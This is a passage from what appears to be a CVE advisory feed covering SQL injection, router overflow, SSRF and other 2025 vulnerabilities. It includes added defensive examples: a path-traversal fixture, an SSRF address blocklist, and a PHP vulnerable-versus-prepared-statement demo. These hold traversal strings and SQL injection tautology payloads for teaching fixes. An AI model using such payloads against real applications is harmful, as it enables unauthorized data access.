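def serve_file_hardened(base_dir: str, requested: str) -> str:
    with open(resolve_under(base_dir, requested)) as fh:
        return fh.read()


def build_fixture() -> tuple:
    """Constructed layout: <root>/www/public/index.html is meant to be served,
    <root>/secret.txt (two levels up) is not. Returns (public_dir, root)."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "www", "public")
    os.makedirs(public)
    with open(os.path.join(public, "index.html"), "w") as fh:
        fh.write("<h1>ok</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("admin:password123")       # constructed; stands in for cleartext credentials
    return public, root


def is_blocked(base_dir: str, requested: str) -> bool:
    try:
        serve_file_hardened(base_dir, requested)
        return False
    except PermissionError:
        return True


if __name__ == "__main__":
    public, root = build_fixture()
    print(serve_file_vulnerable(public, "../../secret.txt"))   # leaks the secret
    print(serve_file_hardened(public, "index.html"))
    print(is_blocked(public, "..%2f..%2fsecret.txt"))
```

Checking the canonical path rather than the raw string is what defeats encoding and symlink tricks; a blacklist of "../" substrings would miss the double-encoded and absolute-path cases exercised here.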
-
CVE-2025-34021
HIGH
CVSS 7.8
CVE-2025-34021 is a high-severity Server-Side Request Forgery (SSRF) vulnerability (CVSS 7.8) affecting multiple Selea Targa IP OCR-ANPR camera models that allows remote unauthenticated attackers to induce arbitrary HTTP requests through unvalidated JSON POST parameters (ipnotify_address and url). An attacker can bypass firewall policies, enumerate internal services, or redirect image fetch and DNS lookup operations to internal or external systems of their choosing. Active exploitation was confirmed by the Shadowserver Foundation on 2025-01-25, indicating real-world attack activity and operational risk.
SSRF
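The Selea SSRF entry describes a notify/fetch feature that will contact any address given in a JSON parameter. The Python below is an added example (not Selea code) of the destination check such a feature needs: a scheme allow-list, no embedded credentials, and rejection of any destination that is, or resolves to, a loopback, private, link-local (including the cloud metadata address), CGNAT or IPv4-mapped range. A resolver is injected so DNS names are covered too; FAKE_DNS and its addresses are a constructed stand-in so the example runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Destinations an outbound notify/fetch feature must never reach: loopback, RFC 1918, link-local
# (169.254.169.254 is the cloud metadata service), CGNAT, "this network", and the IPv6 equivalents
# including IPv4-mapped addresses (::ffff:127.0.0.1 would otherwise slip past the IPv4 rules).
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "::/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]

# Constructed resolver so the example runs offline; stands in for DNS.
FAKE_DNS = {
    "notify.example.net": ["203.0.113.10"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.example.net": ["203.0.113.10", "10.0.0.5"],   # one public and one private record
}


def fake_resolver(host: str) -> list:
    return FAKE_DNS.get(host, [])


def validate_outbound_url(url: str, resolver=fake_resolver) -> str:
    """Return `url` unchanged if it is safe to fetch, else raise ValueError.
    `resolver(host)` returns the IP strings a name resolves to; every one must be allowed."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in URL not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    try:
        addrs = [ipaddress.ip_address(host)]            # IP literal, including bracketed IPv6
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        raise ValueError(f"unresolvable host: {host!r}")  # also catches dotless-decimal tricks
    for ip in addrs:
        if ip.is_multicast or ip.is_reserved or any(ip in net for net in BLOCKED_NETS):
            raise ValueError(f"{host!r} -> {ip} is not an allowed destination")
    return url


def is_allowed(url: str) -> bool:
    try:
        validate_outbound_url(url)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for u in ("http://notify.example.net/hook", "http://169.254.169.254/latest/meta-data/",
              "http://[::ffff:127.0.0.1]/", "http://rebind.example.net/"):
        print(f"{u}: {'allowed' if is_allowed(u) else 'blocked'}")
```

The check is necessary but not sufficient: DNS can change between validation and connection (rebinding), so the HTTP client should connect to the IP that was validated rather than re-resolving the name, and any redirect must be re-validated hop by hop.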
-
CVE-2025-32879
HIGH
CVSS 8.8
CVE-2025-32879 is an authentication bypass and information disclosure vulnerability in COROS PACE 3 firmware, reachable over Bluetooth (CVSS 8.8). Risk factors: public PoC available.
Authentication Bypass
Bluetooth
Information Disclosure
Coros Pace 3 Firmware
-
CVE-2025-6372
HIGH
CVSS 8.8
A buffer overflow vulnerability in D-Link DIR-619L firmware leading to remote code execution (CVSS 8.8). Risk factors: public PoC available.
Buffer Overflow
D-Link
RCE
Dir 619l Firmware
-
CVE-2025-6371
HIGH
CVSS 8.8
CVE-2025-6371 is a critical stack-based buffer overflow vulnerability in D-Link DIR-619L firmware version 2.06B01 affecting the formSetEnableWizard function. An authenticated remote attacker can exploit this vulnerability by manipulating the 'curTime' parameter to achieve remote code execution with high confidentiality, integrity, and availability impact (CVSS 8.8). Exploitation has been publicly disclosed with proof-of-concept available, and this vulnerability only affects end-of-life products no longer receiving vendor support.
Buffer Overflow
D-Link
Stack Overflow
RCE
Dir 619l Firmware
-
CVE-2025-6370
HIGH
CVSS 8.8
A buffer overflow vulnerability in D-Link DIR-619L firmware leading to remote code execution (CVSS 8.8). Risk factors: public PoC available.
Buffer Overflow
D-Link
RCE
Dir 619l Firmware
-
CVE-2025-6369
HIGH
CVSS 8.8
CVE-2025-6369 is a critical stack-based buffer overflow vulnerability in D-Link DIR-619L v2.06B01 affecting the /goform/formdumpeasysetup endpoint. An authenticated remote attacker can exploit improper input validation of the curTime or config.save_network_enabled parameters to achieve remote code execution with high impact on confidentiality, integrity, and availability. Public exploit code exists for this vulnerability, and the affected product is end-of-life with no vendor support available.
Buffer Overflow
D-Link
RCE
Dir 619l Firmware
-
CVE-2025-6368
HIGH
CVSS 8.8
A critical stack-based buffer overflow vulnerability exists in D-Link DIR-619L firmware version 2.06B01, affecting the formSetEmail function via the curTime and config.smtp_email_subject parameters. An authenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with full system compromise (confidentiality, integrity, and availability). Public exploit code has been disclosed, and the affected product is end-of-life with no vendor support available.
Buffer Overflow
D-Link
RCE
Dir 619l Firmware
-
CVE-2025-6367
HIGH
CVSS 8.8
CVE-2025-6367 is a critical stack-based buffer overflow vulnerability in D-Link DIR-619L firmware version 2.06B01, affecting the /goform/formSetDomainFilter endpoint. An authenticated remote attacker can exploit improper input validation on the curTime, sched_name_%d, and url_%d parameters to achieve arbitrary code execution with full system compromise (confidentiality, integrity, and availability). The vulnerability has public exploit disclosure and affects end-of-life hardware no longer receiving vendor support.
Buffer Overflow
D-Link
RCE
Dir 619l Firmware
-
CVE-2025-6364
HIGH
CVSS 7.3
A SQL injection vulnerability in Simple Pizza Ordering System (CVSS 7.3). Risk factors: public PoC available.
PHP
SQLi
Simple Pizza Ordering System
-
CVE-2025-6363
HIGH
CVSS 7.3
CVE-2025-6363 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /adding-exec.php file where the 'ingname' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of database records. With a CVSS score of 7.3 and network-based attack vector requiring no user interaction, this vulnerability poses significant risk to affected deployments, though real-world exploitation likelihood depends on whether POC code and active exploitation attempts are documented.
PHP
SQLi
Remote Code Execution
Simple Pizza Ordering System
-
CVE-2025-6362
HIGH
CVSS 7.3
CVE-2025-6362 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /editpro.php file where the ID parameter is improperly validated. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or system compromise. The vulnerability has a CVSS score of 7.3 (High) and requires no user interaction or authentication, making it a significant risk for deployments of this application.
PHP
SQLi
Simple Pizza Ordering System
-
CVE-2025-6361
HIGH
CVSS 7.3
CVE-2025-6361 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, affecting the /adds.php file's userid parameter. An unauthenticated remote attacker can exploit this vulnerability without user interaction to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of the application database. The vulnerability has a CVSS score of 7.3 (High) and represents an immediate risk to any organization running this unpatched system in production.
PHP
SQLi
Simple Pizza Ordering System
-
CVE-2025-6360
HIGH
CVSS 7.3
CVE-2025-6360 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, affecting the /portal.php file's ID parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL commands, potentially compromising data confidentiality, integrity, and availability. The vulnerability has been publicly disclosed with exploit code available, increasing real-world exploitation risk.
PHP
SQLi
Remote Code Execution
Simple Pizza Ordering System
-
CVE-2025-6359
HIGH
CVSS 7.3
CVE-2025-6359 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /cashconfirm.php file where the 'transactioncode' parameter is unsanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, increasing real-world exploitation risk.
PHP
SQLi
Simple Pizza Ordering System
-
CVE-2025-6358
HIGH
CVSS 7.3
CVE-2025-6358 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, affecting the /saveorder.php file's ID parameter. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, and system disruption. Public proof-of-concept code is available, increasing the immediate risk of active exploitation.
PHP
SQLi
Simple Pizza Ordering System
-
CVE-2025-6357
HIGH
CVSS 7.3
CVE-2025-6357 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /paymentportal.php file where the 'person' parameter is not properly sanitized. An unauthenticated remote attacker can exploit this vulnerability with no user interaction required to execute arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion of database contents. The vulnerability has been publicly disclosed with proof-of-concept code available, increasing the likelihood of active exploitation.
PHP
SQLi
Remote Code Execution
Simple Pizza Ordering System
-
CVE-2025-6356
HIGH
CVSS 7.3
CVE-2025-6356 is a critical SQL injection vulnerability in code-projects Simple Pizza Ordering System version 1.0, specifically in the /addmem.php file that allows unauthenticated remote attackers to manipulate database queries. An attacker can exploit this vulnerability to read, modify, or delete sensitive data from the underlying database. The vulnerability has public exploit code available and may be actively exploited in the wild.
PHP
SQLi
Simple Pizza Ordering System
-
CVE-2025-6355
HIGH
CVSS 7.3
CVE-2025-6355 is a critical SQL injection vulnerability in SourceCodester Online Hotel Reservation System version 1.0, specifically in the /admin/execeditroom.php file where the 'userid' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or denial of service. Public disclosure and proof-of-concept availability significantly elevate real-world exploitation risk.
PHP
SQLi
Online Hotel Reservation System
-
CVE-2025-6354
HIGH
CVSS 7.3
CVE-2025-6354 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the customer signup functionality (/function/customer_signup.php). An unauthenticated remote attacker can manipulate the email parameter to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with proof-of-concept availability and demonstrates active exploitation potential.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6344
HIGH
CVSS 7.3
CVE-2025-6344 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /contactus.php file's email parameter. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. Public disclosure and exploit code availability increase the real-world threat level significantly.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6343
HIGH
CVSS 7.3
CVE-2025-6343 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /admin/admin_product.php file where the 'pid' parameter is not properly sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of the shoe store's database. The exploit has been publicly disclosed with proof-of-concept code available, significantly increasing real-world exploitation risk.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6342
HIGH
CVSS 7.3
CVE-2025-6342 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0, specifically in the /admin/admin_football.php file where the 'pid' parameter is inadequately sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, so exploitation in the wild should be expected.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6339
HIGH
CVSS 7.3
A SQL injection vulnerability in Hospital Management System (CVSS 7.3). Risk factors: public PoC available.
PHP
SQLi
Hospital Management System
-
CVE-2025-6337
HIGH
CVSS 8.8
CVE-2025-6337 is a critical buffer overflow vulnerability in TOTOLINK A3002R and A3002RU routers affecting versions 3.0.0-B20230809.1615 and 4.0.0-B20230531.1404. An authenticated attacker can exploit the 'submit-url' parameter in the /boafrm/formTmultiAP HTTP POST handler to achieve remote code execution with complete system compromise (confidentiality, integrity, and availability). Public exploit code exists and the vulnerability is exploitable over the network with low complexity.
Buffer Overflow
A3002ru Firmware
A3002r Firmware
TOTOLINK
-
CVE-2025-6336
HIGH
CVSS 8.8
CVE-2025-6336 is a critical buffer overflow vulnerability in TOTOLINK EX1200T wireless router (version 4.1.2cu.5232_B20210713) affecting the HTTP POST request handler. An authenticated attacker can exploit improper input validation on the 'submit-url' parameter in the /boafrm/formTmultiAP endpoint to achieve remote code execution with full system compromise (confidentiality, integrity, and availability). Public exploit code is available and the vulnerability has been disclosed; exploitation requires valid credentials but no user interaction.
Buffer Overflow
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-6334
HIGH
CVSS 8.8
CVE-2025-6334 is a critical stack-based buffer overflow vulnerability in D-Link DIR-867 1.0 routers, affecting the Query String Handler's strncpy function implementation. Remote attackers with low privileges can exploit this vulnerability to achieve complete system compromise including confidentiality, integrity, and availability breaches. The vulnerability has documented public exploits available, affects end-of-life hardware no longer receiving vendor support, and carries a high CVSS 3.1 score of 8.8.
Buffer Overflow
D-Link
RCE
Remote Code Execution
Dir 867 Firmware
-
CVE-2025-6330
HIGH
CVSS 7.3
CVE-2025-6330 is a critical SQL injection vulnerability in PHPGurukul Directory Management System version 1.0, specifically in the /searchdata.php file's 'searchdata' parameter. An unauthenticated remote attacker can inject arbitrary SQL commands to compromise confidentiality, integrity, and availability of the underlying database. Public disclosure and proof-of-concept exploitation have occurred, making this an immediately actionable threat even though the CVSS 7.3 (High) score falls short of Critical.
PHP
SQLi
Directory Management System
-
CVE-2025-6328
HIGH
CVSS 8.8
A critical stack-based buffer overflow vulnerability exists in D-Link DIR-815 firmware version 1.01 within the hedwig.cgi module (function sub_403794), allowing remote attackers with low privilege access to execute arbitrary code with high impact on confidentiality, integrity, and availability. Public exploit code is available and the vulnerability may be actively exploited in the wild, making this a high-priority remediation target.
Buffer Overflow
D-Link
RCE
Dir 815 Firmware
-
CVE-2025-6323
HIGH
CVSS 7.3
CVE-2025-6323 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, specifically affecting the /enrollment.php file's 'fathername' parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of the enrollment database. The vulnerability has public proof-of-concept code available and may be actively exploited in the wild.
PHP
SQLi
Pre School Enrollment System
-
CVE-2025-6322
HIGH
CVSS 7.3
CVE-2025-6322 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, affecting the /visit.php file's 'gname' parameter. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. Public exploit disclosure and confirmed POC availability significantly elevate real-world exploitation risk.
PHP
SQLi
Pre School Enrollment System
-
CVE-2025-6318
HIGH
CVSS 7.3
CVE-2025-6318 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, affecting the /admin/check_availability.php file where the 'Username' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. Public disclosure of exploitation details and confirmed POC availability indicate active exploitation risk in the wild.
PHP
SQLi
Pre School Enrollment System
-
CVE-2025-6317
HIGH
CVSS 7.3
CVE-2025-6317 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the /admin/confirm.php file's ID parameter. An unauthenticated remote attacker can execute arbitrary SQL commands with low complexity, potentially leading to unauthorized data access, modification, or service disruption. Public exploit disclosure and the low attack complexity significantly elevate real-world risk even though the CVSS score of 7.3 rates it High rather than Critical.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6316
HIGH
CVSS 7.3
CVE-2025-6316 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /admin/admin_running.php file where the 'qty' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this flaw to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, and while the CVSS score is 7.3 (high), the attack vector is network-based with low complexity, indicating active exploitation is feasible.
PHP
SQLi
Remote Code Execution
Online Shoe Store
-
CVE-2025-6315
HIGH
CVSS 7.3
CVE-2025-6315 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the /cart2.php endpoint via an unsanitized ID parameter. An unauthenticated remote attacker can exploit this over the network with low complexity to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. A public proof-of-concept has been disclosed and the vulnerability may be actively exploited.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6314
HIGH
CVSS 7.3
CVE-2025-6314 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System 1.0, specifically in the /pages/cat_update.php file's ID parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete database contents. The vulnerability has a publicly disclosed exploit (POC available), making it an active threat with immediate exploitation risk; the CVSS 7.3 (High) score reflects a network-based attack with no authentication required.
PHP
SQLi
Sales And Inventory System
-
CVE-2025-6313
HIGH
CVSS 7.3
CVE-2025-6313 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0, affecting the /pages/cat_add.php endpoint where the 'Category' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially compromising data confidentiality, integrity, and availability. The vulnerability has been publicly disclosed with exploit code available and may be actively exploited in the wild.
PHP
SQLi
Sales And Inventory System
-
CVE-2025-6312
HIGH
CVSS 7.3
CVE-2025-6312 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0, specifically in the /pages/cash_transaction.php file where the 'cid' parameter is insufficiently sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploitation details available, so exploitation in the wild should be expected.
PHP
SQLi
Sales And Inventory System
-
CVE-2025-6311
HIGH
CVSS 7.3
CVE-2025-6311 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0 affecting the /pages/account_add.php endpoint. Unauthenticated remote attackers can manipulate the 'id' or 'amount' parameters to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has public exploit disclosure and demonstrates active exploitation risk; the CVSS score of 7.3 rates it High.
PHP
SQLi
Sales And Inventory System
-
CVE-2025-6310
HIGH
CVSS 7.3
A SQL injection vulnerability in Emergency Ambulance Hiring Portal (CVSS 7.3). Risk factors: public PoC available.
PHP
SQLi
Emergency Ambulance Hiring Portal
-
CVE-2025-6307
HIGH
CVSS 7.3
CVE-2025-6307 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /function/edit_customer.php file, where the 'firstname' parameter is insufficiently sanitized, allowing remote unauthenticated attackers to execute arbitrary SQL queries. The vulnerability has been publicly disclosed with proof-of-concept details available, and while rated 7.3 (High) in CVSS v3.1, the network-accessible attack vector combined with no authentication requirement and demonstrated public exploitation significantly elevates real-world risk. Other parameters in the same function are suspected to be vulnerable to the same injection pattern.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6306
HIGH
CVSS 7.3
CVE-2025-6306 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the admin authentication mechanism in /admin/admin_index.php. An unauthenticated remote attacker can manipulate the Username parameter to execute arbitrary SQL queries, potentially leading to unauthorized access, data theft, or data manipulation. The vulnerability has been publicly disclosed with working exploits available, making active exploitation likely.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6305
HIGH
CVSS 7.3
CVE-2025-6305 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /admin/admin_feature.php endpoint via the product_code parameter. An unauthenticated remote attacker can execute arbitrary SQL commands to read, modify, or delete database contents. The vulnerability has public exploit disclosure and carries a CVSS 7.3 score with confirmed exploitation potential.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6304
HIGH
CVSS 7.3
CVE-2025-6304 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /cart.php file's qty[] parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete sensitive data. The vulnerability has been publicly disclosed with proof-of-concept exploits available, presenting immediate exploitation risk to unpatched instances of this e-commerce application.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6303
HIGH
CVSS 7.3
CVE-2025-6303 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /contactus1.php file's Message parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, making active exploitation likely.
PHP
SQLi
Online Shoe Store
-
CVE-2025-6302
HIGH
CVSS 8.8
CVE-2025-6302 is a critical stack-based buffer overflow vulnerability in TOTOLINK EX1200T router firmware version 4.1.2cu.5232_B20210713, specifically in the setStaticDhcpConfig function of /cgi-bin/cstecgi.cgi. An authenticated attacker can exploit this by sending a malicious Comment parameter to achieve remote code execution with full system compromise (confidentiality, integrity, and availability impact). Public exploit code has been disclosed, so exploitation should be expected.
Buffer Overflow
Ex1200t Firmware
TOTOLINK
-
CVE-2025-6300
HIGH
CVSS 7.3
A SQL injection vulnerability in Employee Record Management System, classified as critical (CVSS 7.3). Risk factors: public PoC available.
PHP
SQLi
Employee Record Management System
-
CVE-2025-6296
HIGH
CVSS 7.3
CVE-2025-6296 is a critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /empty_rooms.php file's search_box parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially achieving unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploits available, making active exploitation highly probable in real-world deployments.
PHP
SQLi
Hostel Management System
-
CVE-2025-6295
HIGH
CVSS 7.3
A SQL injection vulnerability in Hostel Management System (CVSS 7.3). Risk factors: public PoC available.
PHP
SQLi
Hostel Management System
-
CVE-2025-6294
HIGH
CVSS 7.3
CVE-2025-6294 is a critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /contact.php file's hostel_name parameter. An unauthenticated remote attacker can exploit this without user interaction to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, and while CVSS 7.3 rates it High rather than Critical, with confidentiality, integrity, and availability impact, the simplicity of exploitation (network-accessible, no privileges required, low complexity) makes this a practical threat requiring immediate patching.
PHP
SQLi
Hostel Management System
-
CVE-2025-6293
HIGH
CVSS 7.3
CVE-2025-6293 is a critical SQL injection vulnerability in code-projects Hostel Management System v1.0 affecting the /contact_manager.php endpoint, where the student_roll_no parameter is inadequately sanitized, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially exfiltrate, modify, or delete database records. Public exploit disclosure and active exploitation signals indicate this is a high-priority threat requiring immediate remediation.
PHP
SQLi
Hostel Management System
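Worked example, added here and not code from Simple Pizza Ordering System, Online Shoe Store, Hostel Management System or any other project in this list: the unsanitized-parameter pattern behind the SQL injection entries above, beside the prepared-statement fix. It runs against an in-memory SQLite database through PDO (pdo_sqlite extension), with a constructed orders table; the table, columns, rows, function names and payloads are assumptions for the demo. The two lookups stand in for the two parameter shapes the advisories name: an unquoted numeric ID (saveorder.php, cat_update.php, confirm.php) and a quoted string field (person, email, hostel_name).

```php
<?php
// Added example (not code from any project listed above). The table, rows,
// function names and payloads are constructed for this demo; the advisory
// file names in comments are only there to tie the pattern back to the feed.
declare(strict_types=1);

function demoDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE orders (id INTEGER PRIMARY KEY, customer TEXT, total REAL)');
    $db->exec("INSERT INTO orders VALUES (1, 'alice', 12.50), (2, 'bob', 30.00), (3, 'carol', 8.75)");
    return $db;
}

// Vulnerable, numeric parameter: the request value is pasted into the SQL text.
// This is the shape of an unsanitized ID parameter (e.g. /saveorder.php?ID=...).
function findOrderVulnerable(PDO $db, string $id): array {
    $sql = 'SELECT id, customer, total FROM orders WHERE id = ' . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Vulnerable, quoted string parameter (e.g. a 'person' or 'email' field).
function findByCustomerVulnerable(PDO $db, string $name): array {
    $sql = "SELECT id, customer, total FROM orders WHERE customer = '" . $name . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value is bound as a parameter, so it is sent to the database
// separately from the query text and can never change the query's structure.
// For numeric IDs, a digit allow-list is applied first; an ID that is not all
// digits is simply not an ID.
function findOrderSafe(PDO $db, string $id): array {
    if (!ctype_digit($id)) {
        return [];
    }
    $stmt = $db->prepare('SELECT id, customer, total FROM orders WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function findByCustomerSafe(PDO $db, string $name): array {
    $stmt = $db->prepare('SELECT id, customer, total FROM orders WHERE customer = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = demoDb();

// Numeric parameter: a tautology needs no quote character at all, so stripping
// or escaping quotes would not have stopped it.
$payloadNumeric = '1 OR 1=1';
printf("vulnerable id lookup:   %d row(s)\n", count(findOrderVulnerable($db, $payloadNumeric)));
printf("hardened id lookup:     %d row(s)\n", count(findOrderSafe($db, $payloadNumeric)));

// String parameter: close the quote, then OR in a tautology that reuses the
// closing quote the original query supplies.
$payloadString = "x' OR '1'='1";
printf("vulnerable name lookup: %d row(s)\n", count(findByCustomerVulnerable($db, $payloadString)));
printf("hardened name lookup:   %d row(s)\n", count(findByCustomerSafe($db, $payloadString)));
```

Run it with the php CLI. Both vulnerable lookups return the whole table for their tautology payloads, while the prepared-statement versions return nothing: the bound string is compared literally, and the numeric payload never reaches the database. The digit check is not the real defense (binding is); it is there because a parameter that must be an integer should be rejected at the edge rather than coerced, and because it makes the probe traffic in the web logs obvious.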
-
CVE-2025-6292
HIGH
CVSS 8.8
CVE-2025-6292 is a critical stack-based buffer overflow vulnerability in D-Link DIR-825 routers (version 2.03 and potentially others) that allows authenticated attackers to execute arbitrary code remotely via malformed HTTP POST requests to the vulnerable HTTP POST Request Handler function. The vulnerability affects end-of-life products no longer receiving security updates from D-Link, and public exploit code has been disclosed, increasing real-world exploitation risk despite requiring valid credentials.
Buffer Overflow
D-Link
RCE
Denial Of Service
Dir 825 Firmware
-
CVE-2025-6291
HIGH
CVSS 8.8
CVE-2025-6291 is a critical stack-based buffer overflow vulnerability in D-Link DIR-825 firmware version 2.03, exploitable via HTTP POST requests to the do_file function. An authenticated attacker can achieve complete system compromise (confidentiality, integrity, and availability violations) remotely without user interaction. Public exploit code exists and the affected product is end-of-life with no vendor support, elevating real-world risk despite authentication requirement.
Buffer Overflow
D-Link
RCE
Dir 825 Firmware
-
CVE-2025-5121
HIGH
CVSS 8.5
GitLab CE/EE contains a missing authorization check (CWE-862) in its compliance frameworks feature that allows authenticated users with limited privileges to apply compliance frameworks to projects outside the intended scope of the framework's group, potentially affecting confidentiality, integrity, and availability. This vulnerability affects GitLab versions 17.11 before 17.11.4 and 18.0 before 18.0.2. The CVSS 8.5 score reflects high severity due to the scope change and multiple impact categories, though exploitation requires low-level user authentication and higher-than-typical attack complexity.
Gitlab
Privilege Escalation
-
CVE-2025-4102
HIGH
CVSS 7.2
The Beaver Builder Plugin (Starter Version) for WordPress contains an arbitrary file upload vulnerability in the 'save_enabled_icons' function due to missing file type validation, affecting all versions up to and including 2.9.1. Authenticated attackers with Administrator-level access can upload arbitrary files to the server, potentially enabling remote code execution. The fix in version 2.9.1 was only partial, so 2.9.1 should not be treated as a complete remediation.
WordPress
RCE
PHP
Privilege Escalation
Beaver Builder
-
CVE-2025-3319
HIGH
CVSS 8.1
CVE-2025-3319 is an authentication bypass vulnerability in IBM Spectrum Protect Server versions 8.1 through 8.1.26 caused by improper session authentication mechanisms. This flaw allows unauthenticated network attackers to bypass authentication and gain unauthorized access to protected resources, potentially compromising backup and recovery infrastructure. With a CVSS score of 8.1 (High) and network-based attack vector, this vulnerability poses significant risk to organizations relying on Spectrum Protect for data protection.
IBM
Authentication Bypass
Spectrum Protect Server
-
CVE-2025-2443
HIGH
CVSS 8.7
CVE-2025-2443 is a cross-site scripting (XSS) vulnerability in GitLab (CVSS 8.7) that also allows a Content Security Policy bypass. High severity vulnerability requiring prompt remediation.
Gitlab
XSS
-
CVE-2024-4994
HIGH
CVSS 8.1
